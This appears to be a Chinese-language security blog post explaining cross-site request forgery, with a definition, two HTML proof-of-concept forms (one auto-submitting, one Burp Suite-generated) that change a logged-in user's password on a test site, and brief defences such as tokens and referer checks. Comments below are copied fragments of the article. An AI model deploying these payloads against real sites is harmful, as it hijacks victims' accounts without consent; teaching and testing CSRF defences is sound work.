CSRF漏洞和利用
CSRF定义: 跨站请求伪造(英语:Cross-site request forgery),也被称为 one-click attack 或者 session riding,通常缩写为 CSRF , 是一种挟制用户在当前已登录的Web应用程序上执行非本意的操作的攻击方法。
简单地说,是攻击者通过一些技术手段欺骗用户的浏览器去访问一个自己曾经认证过的网站并执行一些操作(如发邮件,发消息,甚至财产操作如转账和购买商品)。由于浏览器曾经认证过,所以被访问的网站会认为是真正的用户操作而去执行。这利用了web中用户身份验证的一个漏洞:简单的身份验证只能保证请求发自某个用户的浏览器,却不能保证请求本身是用户自愿发出的。
1、例子 修改密码
http://www.webtester.com/csrf/csrf01.php?c=main
登录过的网站 访问csrf.html就会触payload 从而修改密码。
<html> <body> <form name="csrf" action="http://www.webtester.com/csrf/csrf01.php?c=update" method="POST"> <input type=text name=password value="123456"></input> <input type="submit" value="submit" /> </form> <script> document.csrf.submit(); </script> </body> </html>
访问 http://www.demo.com/post-csrf.html 就会修改密码
2、测试方法
用burpsuite生成csrf payload
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://www.webtester.com/csrf/csrf01.php?c=update" method="POST">
<input type="hidden" name="password" value="a123456" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>3防御方法
加上token 进行认证
判断页面来源
页面加验证码判断
下一篇:怎么从目录里getshell
相关文章
- 5条评论
囤梦唔猫2022-05-28 13:23:26- 的网站并执行一些操作(如发邮件,发消息,甚至财产操作如转账和购买商品)。由于浏览器曾经认证过,所以被访问的网站会认为是真正的用户操作而去执行。这利用了web中用户身份验证的
笙沉桔烟2022-05-28 17:29:21- 法。简单地说,是攻击者通过一些技术手段欺骗用户的浏览器去访问一个自己曾经认证过的网站并执行一些操作(如发邮件,发消息,甚至财产操作如转账和购买商品)。由于浏览器曾经认证过,所以被访问的网站会认为是真正的用户操作而去执行。这利用了web中用户身份验证的一个漏洞:简单的
野欢岁吢2022-05-28 15:05:52- 操作(如发邮件,发消息,甚至财产操作如转账和购买商品)。由于浏览器曾经认证过,所以被访问的网站会认为是真正的用户操作而去执行。这利用了web中用户身份验证的一个漏洞:简单的身份验证
痛言唔猫2022-05-28 09:58:42- 用程序上执行非本意的操作的攻击方法。简单地说,是攻击者通过一些技术手段欺骗用户的浏览器去访问一个自己曾经认证过的网站并执行一些操作(如发邮件,发消息,甚至财产操作如转账和购买商品)。由于浏览器曾经认证过,所以被访问的网站会认为是真正的
鸢旧长野2022-05-28 12:43:33- 己曾经认证过的网站并执行一些操作(如发邮件,发消息,甚至财产操作如转账和购买商品)。由于浏览器曾经认证过,所以被访问的网站会认为是真正的用户操作而去执行。这利用了we
滇ICP备19002590号-1